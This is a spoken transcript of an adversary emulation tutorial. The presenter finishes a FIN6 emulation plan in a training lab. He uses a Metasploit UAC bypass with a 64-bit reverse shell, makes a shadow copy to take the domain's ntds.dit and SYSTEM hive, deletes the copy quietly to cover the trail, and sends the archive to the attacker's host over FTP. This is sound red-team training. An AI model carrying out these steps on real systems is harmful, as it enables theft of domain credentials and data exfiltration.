Hey guys, HackerSploit here, back again with another video. Welcome back to the Adversary Emulation series. I apologize for the lag between the previous video and this one, but we're pretty much going to be continuing from where we left off, which was, the FIN6 emulation plan. We had already performed obtained initial access. We also, explored as part of that the various ways of creating word macros or VBA macros for initial access, and then in the previous video we explored Active Directory enumeration, and the objective there, based on the emulation plan, was to stage this information for exfiltration. So in this video we're going to be continuing by taking a look at privilege escalation as per the emulation plan. And then staging a couple of additional files for exfiltration. These are, just files that or information that we'll, obtain through local enumeration, but quite important, and that require elevated privileges. And then we'll pretty much be wrapping up the FIN6 emulation plan by, once we've staged the files, we're going to be creating the archive and then exfiltrating over FTP. So if you're new to this series, I highly recommend you take a look at the series or the first video in the series. A link to that will be in the description section. And likewise, if you're unaware, this is your first time watching this series, we will be going through this demonstration using a set of labs on the CyberRanges platform. If you're new to CyberRanges, you can register for an account. It's app.cyberranges.com. A link will be in the description section. It's absolutely free. And you want to navigate, once you've created an account, just navigate to the community or free section, as you can see here, and you'll find the MITRE ATT&CK Defender Adversary Emulation Fundamentals playlist of labs. So they're absolutely free. And the FIN6 emulation plan is pretty much iterated in lab 1.3, which is what we're going to be using. So you can just click on that lab and start it up. You'll be provided with access to your own Kali Linux system and the target domain controller, which is running Windows Server 2019. So link to the lab and playlist of labs will also be in the description section. But let's not waste any more time. So I've pretty much, I'm going to be continuing from where we left off. We had already staged or performed Active Directory enumeration, and we had staged all of the files containing the information we've enumerated in the public user's home directory. So that's where we are going to be continuing off from. All right, so as you can see, I have access, or I have already have access to the target system, and I've already performed, everything that we did up to the last point in the previous video. So these are all the files that we had staged. So, pretty much AD enumeration when we save the info in text files. So as I mentioned in the previous video, if you follow the emulation plan, it involved opening the macro enabled or the macro document we used for initial access with elevated privileges. So you essentially launch Word as admin and then open the document, which would mean you get elevated privileges in any case. But we didn't follow that, and the reason for that will become apparent. If you want to take a look at a more realistic privilege escalation vector, then that's what we'll be doing. So I'll just terminate out of my PowerShell shell here, and if we follow the emulation plan, I'll just zoom in so you can see this a little bit better. So it says to type in get system, and you'll see that fails. All right, so we will put this session in the background, and I will now I will search for the bypass UAC module, and the one we're looking for, the one that works on Windows Server 2019, is this one right over here, the bypass UAC com hijack. So I'll say use module 12, and then we will, all right, so no payload, show options. Let's see. Let's check the architecture of my session. It's 64-bit, and I think, so if we say set payload to Windows x64, let's see, x64, whether that will bring up anything. Okay, no. So this is this is one of the issues with the new version of Metasploit. And what I'll do, I'll just switch into full screen so it's clearer for you. So this is something that I wouldn't say it's an issue in Metasploit or MSF6, but with certain older modules that didn't have the architecture specified, you can only set 32-bit interpreter payload. So, you know, if I say, you know, in this case, Windows, you can see that, you know, there's not going to be the option for the 64-bit interpreter session, which I need because my the current session I have is 64-bit or that of, you know, 64-bit architecture. So what we'll need to do is we'll need to modify this exploit module to support that. So I'll just go ahead and open up a new terminal, and I'll use vim to modify the exploit module Ruby file. So sudo vim, and I'll say etc. Actually, no, that's going to be stored under user share Metasploit framework. Exploits, no, it's going to be under modules, exploits, we're going to say Windows, and then local, I believe, local, and then we're going to say bypass. It should be in this folder, I think. Let's see. So under local, let's see what's in here. So bypass UAC com, it should be in here. So we'll just try and we'll say bypass UAC. What we're looking for is the com hijack. So it's just underscore com hijack Ruby. And we'll just open this up. And let's go all the way to where the module info is specified. So I will say right over here. So platform, as I suspected, there's no architecture. So what we need to do in order to use a 64-bit interpreter payload is just modify this here. And I'm just going to switch to a different browser because this is a bit slow, so just give me a second. All right, that should be much better. So on the platform, I will just say over here, this would be architecture, I'm pretty sure. And then we then need to say, we'll say both. So architecture, we'll say x86, and then I believe it's the same for ARM architecture x64. So we'll just close that up there, and then do that there, and then write and quit, and then we'll go back into Metasploit, and now we need to reload all. This will reload the module so we can, you know, they load with the new configuration. By the way, the only reason why I'm showing you this is because if you're using the latest version of Metasploit, you're going to experience this issue quite a bit with some of the older modules that didn't have the architecture explicitly defined. And, you know, it's not that they don't support or you can't use different payloads, you know, different payloads with different architectures. It's really, you know, that they are undefined, and there's some strictures within Metasploit that prevent that. So now I'll just say search bypass UAC. I know I already have the module loaded, but we want, where is it? So com hijack, it's still not showing, you know, the supported payloads, but now if I say set payload Windows x64, there we are, fantastic. Interpreter, reverse TCP. Okay, so session ID is 1, so show options. So I'll set the L port to something different, so I can differentiate. So we'll say set session 1, and then exploit, and this should allow us to elevate our privileges and get an elevated interpreter session on the target. So let's see if this works. Hopefully it does, or I need to set the target option, maybe, probably. But yeah, we'll just let this run and see if we get a session. All right, just had to run it one more time. And so there we are, we get a interpreter session. So this info, we can see target DC, it's 64-bit, and now we can sort of proceed with staging some additional files that, you know, require elevated privileges, one of which is to create a volume shadow copy of the entire C drive. So what is a volume shadow copy? A volume shadow copy is pretty much a snapshot, if you will, of a, you know, set of files, in this particular case, you know, files within the C drive. And the advantage with this is, you know, the advantage of creating a volume shadow copy is because we can access or copy files even, you know, when the Windows specific files are being used or when the operating system is running. So it's sort of like taking a snapshot of the Windows system, right? So in order to do this, you obviously need elevated privileges, and I'll just navigate to C users public. I'll open up a shell. So, you know, if I say, who am I here? So who am I, priv, like so, yeah, you can see we have that there. In any case, we can use VSS admin, and we're going to say create shadow. So create shadow, and then for C, I think we just need to specify the drive here. So for C, and it's going to create it, and pay attention to the shadow copy details. So you have the copy ID and then the volume name. So we're going to need the volume name here. We don't just want the actual name itself, but, you know, pretty much the entire path here. So we're now going to copy the ntds.dit file from the shadow copy, because we have the directory here, into our current working directory, which is C users public. So we're just going to copy this here, like so, and we're now going to say copy, and we want to paste this in here and say we want Windows ntds and ntds.dit, and then we want to copy it to users. Let's see if I'm typing that correctly. So my bad, I've made a mistake there. So we're just going to say copy Windows ntds and then ntds.dit, and we'll copy it into C users public, and we'll say ad ntds. We'll maintain the file prefix ad, because that will be sort of important when we'll be compressing the files or staging them for exfiltration. But I'll hit enter. So we should see it now. If I can actually find it in here, 1 second. ad nt, we should see it here. There we are. So we have it right over here. And now we can also copy the registries, the system registry hive and the system configuration file into, you know, current working directory. So that can be easily done by saying, oh, that's weird. So we can say reg save hklm system, so HK local machine system, and then C users public, and we'll just call it ad sys reg. Okay, and then we'll say copy. We're gonna get the shadow copy name again, which I believe I'd already copied. So Windows system 32 config, and then it's system, I believe. So system, and then we want to copy it to C users public ad, and then system CFG. All right, so that's copied here, and, you know, we should have everything we need. One thing you can also do, I don't think it's explicitly part of the emulation plan, is to, delete the volume, the shadow volume, sorry, not the shadow volume, the shadow copy that we created. And, you can easily do that by saying VSS admin and then delete shadows. We're going to say shadow is equal to, you need the volume ID. So you can do that if you want to. Let's actually do it here. Where's the ID? So in this case, we actually need the ID here. So like so, just going to copy that there. So shadow volume ID, and then we can say do this quietly. So, just some stealth over here. That's weird. So VSS admin delete shadows. Shadow is equal to the volume ID, and then I said quiet. Let's see. I would need to specify the ID with brackets. So we'll say VSS admin delete shadows. Shadow is equal to, sorry, let me just put that in there like so. I think that is what I was missing. Yeah, I think that's done it. Okay, so we now move on to the next step, which is, we've completed local enumeration or discovery, and we've collected all the files that we require. Now, FIN6 archives all their collected data using a renamed command line version of the 7-zip, executable or tool. And, it's already set up on the Windows system, as part of the environment, so you don't have to do it. But what it's called, or what is known to be called, is 7.exe, and they typically do the following. So MX3 is type of compression there, and then they, in this case, they've been known to call stuff like ad.7zip, and what we want to compress is any file with the prefix ad underscore. So we'll use the wildcard operator and hit enter. All right, so there we are. It's created the 7-zip archive, which we now can exfiltrate. So we're now moving on to exfiltration. So the last task in this emulation plan is to exfiltrate what we've collected, and more specifically that 7-zip archive. So at the time when this lab was created, the emulation plan called for the use of plink.exe. So based on what is known, they've been known to exfiltrate over the web primarily, but that particular emulation plan, or the plan that was used to build this lab, did not clarify on the procedures to perform the file transfer, or the procedures to emulate with regards to performing the file transfer via web service. So instead of simply using an alternative procedure, we can pretty much try and utilize another technique or procedure, in this case really just a protocol. And what we're going to be doing is taking a look at how to exfiltrate via FTP. So the first thing we need to do is set up an FTP server on the Kali Linux system, which we can easily do. So I'm currently within the lab 1.3 folder here on the Kali Linux system, and we can use Python 3, the module py ftpd, ftpd lib, I believe it's called, and then we'll say port 21. The directory is home, attacker and adversary emulation, and then labs. We'll save it in lab 1.3. So lab 1.3, and we'll set a user, and we'll just call it FTP user. And of course, a real adversary will not keep things this simple. And then the password, we'll just call it FTP pass, because I know that I will forget this. So that'll set up the FTP server on the Kali Linux system. And now we can go onto the Windows system, and we will be utilizing the Windows FTP client. Now, Windows FTP client is interactive, which means we can't use a interpreter session. We need to have a native shell, which we do. So in order to make this easy, we'll create an FTP file containing the commands or arguments that we want the FTP server to execute. In this case, connect to the FTP client to execute. In this case, we want the FTP client on Windows to reach out to the FTP server on the Kali Linux system, authenticate, and then pretty much put or upload the ad.7zip archive that we created here that contains all the information that we'd enumerated or collected. So in order to do this, we're just going to use a text file, and we'll put in our FTP arguments. So the first thing we need to do is say open 192.168.125 and 103. So the Kali Linux IP address, which is hosting the FTP server, and we'll just save it in ftp.txt. We then need to authenticate. So we say FTP user, that's going to be the username, and we're just going to add it to ftp.txt. So just not overwrite the file, add it as an additional argument. And then we're going to say echo FTP pass, ftp.txt. And then we want to say echo put. This is where we now upload the archive or the 7-zip file. And we want to say ftp.txt. And then we also want to terminate the connection by saying by, standard FTP commands or syntax, ftp.txt, hit enter. And now if I say type ftp.txt, you can see that that's there. So we can now utilize the Windows FTP client and specify or pretty much pass our text file that contains the commands by saying ftp s, and then we say ftp.txt, hit enter, and it looks like it worked. So we can go into the FTP server here. Let's see, FTP logged in, stored the following, and now if we check the folder, on the Kali Linux system, Adversary Emulation, Labs, Lab 1.3, we have ad.7zip. I don't think we can extract it on this system because we don't have the 7-zip utility. I think we do, but this will contain all the files. And, if we switch over to the Windows system, we'll be able to see the archive created and what is stored inside. So let me actually do that. I'm just going to switch over to the Windows system. All right, so I'm on the Windows system now, and I'll just open up a file explorer. So where did we save it? C users public, and there we are. So I think WinRAR can actually extract it. So you can see that it is a functional archive. So in here we should have everything so we have the system, the system registry configuration, NTDS file here, and, all the info that we enumerated. So, we can open this up here where we enumerated computers, so on and so forth. So this is, this sort of represents the first phase of, the emulation plan, which is what FIN6 typically does. They, once they gain initial access, they perform enumeration, they exfiltrate the information that they've gathered or collected about the target environment, and then they move on to stage 2, which, is not going to be part of what we're emulating. But with that being said, that brings us to the end of this video and the, emulating FIN6 series. We're now going to be moving on to emulating APT29. So there's going to be a lot of advanced stuff in there, ranging from, resource development, payloads. We're going to be using a PDF and a link file or a shortcut for initial access. So it's pretty much going to encompass everything you guys wanted. But remember, this first series on FIN6 was meant to be, relatively simple. But hopefully it sets the stage for the other series. In any case, as I said, that's going to be it for this video. If you enjoyed this video, found value in it, please leave a like down below. If you have any questions, comments, suggestions, leave them in the comment section. And as always, all the links and links to the labs will be in the description section. But yeah, that brings us to the end, and I'll be seeing you guys in the next video.